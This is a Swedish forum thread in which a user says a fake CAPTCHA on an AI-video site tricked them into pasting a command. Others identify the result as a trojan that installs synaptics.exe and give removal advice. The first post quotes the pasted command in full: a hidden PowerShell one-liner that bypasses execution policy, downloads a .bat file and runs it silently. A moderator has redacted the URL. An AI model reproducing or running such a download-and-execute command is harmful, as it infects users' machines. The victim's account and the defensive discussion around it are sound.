Råkade nog installera ett virus

Permalänk
Medlem

Råkade nog installera ett virus

Såg en sida om att generera AI filmer så satte ihop en scen (prompt) och sidan sa att den genererade filen sedan kom det upp en ruta att verifiera att man inte är en robot. När man klickade på att man ej är en robot kom det upp en instruktion att öppna kommandotolken trycka ctrl v och enter så gjorde det av ren reflex dum som jag är.. Sedan kom en kort videosnutt som inte alls var scenen jag beskrev.. kollade vad jag hade i klippminnet och det var följande:

powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'https://*länk raderad*' -OutFile $env:TEMP\file.bat; Start-Process $env:TEMP\file.bat -WindowStyle Hidden} #Authentication Is Not a Robot Press Enter to confirm

Ok så Bypass på executionpolicy och hidden är ju rätt säkra indikatorer på att det inte e helt legit..

Hittar naturligtvis inte 1.bat eller file.bat filerna

Så frågan är vad detta är för någon skit? Verkar vara ngn backdoor .. kollade med Housecall Trend Micro men den hittar inget..

Någon som vet vad för skit jag råkat installera och hur jag blir av med det?

Tack.

Redigerat bort länk till skadlig fil /mod
Visa signatur

I7 920 @ 4,2GHz, Gigabyte GA-X58A-UD7, 6 GB Coirsair XMS 7-7-7-20-1, Noctua D-14, Gigabyte 9800GT, Coirsair 650W, Egenmoddat Chassi med 290mm frontfläktar, 2 st 120mm top fläktar och 1 90mm fläkt där bak.

Permalänk
Medlem

Kan man inte ladda ner bat filen manuellt, du har ju länken där och sen öppna i notepad och se vad fan den vill göra?

Bat-filer brukar väl vara blockade utav windows som default?

https://any.run/report/daad38c44c229a362164f059e24225cd841fdf...

Visa signatur

Case: Fractal Design Torrent Solid Black MOBO: ASUS ROG STRIX X670E-A GAMING WIFI CPU: AMD Ryxen 7 7800X3D CPU cooler: Noctua NH-D15 RAM: G.Skill Trident Z5 Neo DDR5 6000MHz CL30 32GB GPU: MSI RTX 3080 GAMING Z TRIO 12G PSU: ROG Strix 1000W Gold Aura Edition M2: Kingston Fury Renegade 2TB Fans: 4x Noctua NF-A12x25
Monitor: ASUS ROG Swift PG27AQDM 27" 240Hz 1440p OLED QHD Mouse: Razer Viper v3 Pro Wireless
Mousepad:
Artisan Hien Keyboard: Wooting Two HE Headset: Audeze Maxwell Mic: Blue Yeti X

Permalänk
Medlem

EDIT: Sorry, sent svar. Redan svar ovan

Det är en Trojan
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclop...

Visa signatur

🟢 Main: Ryzen7 5800X | Strix x470-I | 32GB | RTX2070S | Samsung C49RG9
🔵 unRaid: Ryzen5 2700X | B450M DS3H | 32GB
🟠 Tfn: Google Pixel 7 Lime Green

-:| @ eller citera för svar |:-

Permalänk
Medlem

Verkar ju som defender blockar så därför du inte hittar filen. Kolla Windows defender och se vad den blockat åt dig. Sen kan de ju inte skada å köra en full scan.

Visa signatur

Case: Fractal Design Torrent Solid Black MOBO: ASUS ROG STRIX X670E-A GAMING WIFI CPU: AMD Ryxen 7 7800X3D CPU cooler: Noctua NH-D15 RAM: G.Skill Trident Z5 Neo DDR5 6000MHz CL30 32GB GPU: MSI RTX 3080 GAMING Z TRIO 12G PSU: ROG Strix 1000W Gold Aura Edition M2: Kingston Fury Renegade 2TB Fans: 4x Noctua NF-A12x25
Monitor: ASUS ROG Swift PG27AQDM 27" 240Hz 1440p OLED QHD Mouse: Razer Viper v3 Pro Wireless
Mousepad:
Artisan Hien Keyboard: Wooting Two HE Headset: Audeze Maxwell Mic: Blue Yeti X

Permalänk
Medlem
Skrivet av krEJZi:

Kan man inte ladda ner bat filen manuellt, du har ju länken där och sen öppna i notepad och se vad fan den vill göra?

Bat-filer brukar väl vara blockade utav windows som default?

https://any.run/report/daad38c44c229a362164f059e24225cd841fdf...

Det är enkodat/krypterat så du kan inte bara läsa filen rakt av

Från det som gick att läsa så verkar det installeras någon fil som kallas synaptics.exe

Permalänk
Arvid Nordqvist-mannen
Skrivet av pine-orange:

Det är enkodat/krypterat så du kan inte bara läsa filen rakt av

Från det som gick att läsa så verkar det installeras någon fil som kallas synaptics.exe

Det ser onekligen ut som kinesiska/kantonesiska.
Google translate lyckas översätta typ 95%

Men ja enkodat for sure

Permalänk
Medlem
Skrivet av tcntad:

Det ser onekligen ut som kinesiska/kantonesiska.
Google translate lyckas översätta typ 95%

Men ja enkodat for sure

Det visade inte min textläsare, det gör saken betydligt enklare

Permalänk
Medlem

Tack alla,
jo den installerar synaptics.exe.
Jag provade att ladda ner bat filen direkt men den stoppades av windows defender och när jag tittade i defender stod det att den stoppat .bat filen kl xx.xx men det stod ingenting i windows defender om att den stoppat filen 5 min tidigare när jag råkade köra powershell kommandot.

Som tur är var det ngn bugg eller om jag råkade dubbelköra kommandot för det kom upp en info ruta att den inte kunde hitta filen i appdata/sfsfsdf/sdfsdf Synaptics.exe
Det var så jag hittade att den installerat synaptics på datorn. Jag försökte deleta filen men det gick inte eftersom den användes av python.
Jag öppnade processhanteraren och såg att python processen kördes så jag dödade den och därefter kunde jag deleta synaptics.exe direkt i filhanteraren.. Verkar inte som den kommit tillbaka även efter att jag startat om datorn ett par ggr så tror det är fixat men man vet ju aldrig..

Visa signatur

I7 920 @ 4,2GHz, Gigabyte GA-X58A-UD7, 6 GB Coirsair XMS 7-7-7-20-1, Noctua D-14, Gigabyte 9800GT, Coirsair 650W, Egenmoddat Chassi med 290mm frontfläktar, 2 st 120mm top fläktar och 1 90mm fläkt där bak.

Permalänk
Medlem

Blås datorn :')

Permalänk
Medlem

Absolut bästa är ju att omformatera datorn. Du kan ju chansa och köra gratisversionen av Malwarebytes och Hitman Pro och se om du hittar något annars.

Visa signatur

Dator: ASUS Prime 470x PRO - AMD 5800X3D - MSI RTX 2070 ARMOR OC - EVGA SuperNova G3 650W - Fractal Design Define R5 - Noctua NH-D15 - ASUS Xonar DGX. Kringutrustning: Corsair M65 Pro - Qpad MK-90 - Sennheiser 350 SE. ASUS MG279Q.

Permalänk
Medlem
Skrivet av CooingPendulum:

Blås datorn :')

Skrivet av Jink:

Absolut bästa är ju att omformatera datorn. Du kan ju chansa och köra gratisversionen av Malwarebytes och Hitman Pro och se om du hittar något annars.

Mmm men jag fick bort filen ganska snabbt och ser inga tecken på att ngt annat skulle vara fel så tror det är lugnt.

Kanske ska skapa en nudes mapp och lägga in lite pics på några rediga fläsktroll däri så får kineshackarna skylla sig själva om de rotar runt inne på min dator

Visa signatur

I7 920 @ 4,2GHz, Gigabyte GA-X58A-UD7, 6 GB Coirsair XMS 7-7-7-20-1, Noctua D-14, Gigabyte 9800GT, Coirsair 650W, Egenmoddat Chassi med 290mm frontfläktar, 2 st 120mm top fläktar och 1 90mm fläkt där bak.

Permalänk
Medlem
Skrivet av hybris6:

Mmm men jag fick bort filen ganska snabbt och ser inga tecken på att ngt annat skulle vara fel så tror det är lugnt.

Kanske ska skapa en nudes mapp och lägga in lite pics på några rediga fläsktroll däri så får kineshackarna skylla sig själva om de rotar runt inne på min dator

Haha!

Risken är väl att de inte alls är ute efter dina filer utan istället utnyttja din CPU/GPU mm.

Permalänk
Medlem
Skrivet av CooingPendulum:

Haha!

Risken är väl att de inte alls är ute efter dina filer utan istället utnyttja din CPU/GPU mm.

Precis, botnät kanske

Permalänk
Medlem

Skulle rekommendera att installera om Windows för säkerhets skull.

Om du ändå väljer att inte göra en ominstallation av Windows så kör i alla fall en offline scan, om du inte redan gjort det?

Microsoft Defender Offline scan:

Sedan kan du också köra:
Remove malware with HitmanPro
Norton Power Eraser - Free virus and malware removal tool for Windows

Permalänk
Medlem
Skrivet av hybris6:

Mmm men jag fick bort filen ganska snabbt och ser inga tecken på att ngt annat skulle vara fel så tror det är lugnt.

Har du kollat på .bat scriptet och sett att den med 100% säkerhet bara installerade synaptics.exe, och har du 100% koll på vad synaptics.exe kan ha gjort under tiden den kördes för att säkerställa att allt försvinner med att döda processen och ta bort filen? Är du inte det, så blås datorn.

Förresten, -ExecutionPolicy Bypass, triggar inte det UAC eller kräver att powershells körs som admin? Kanske dags att se över internetkörkortet när man tillåter random grejer köras som admin...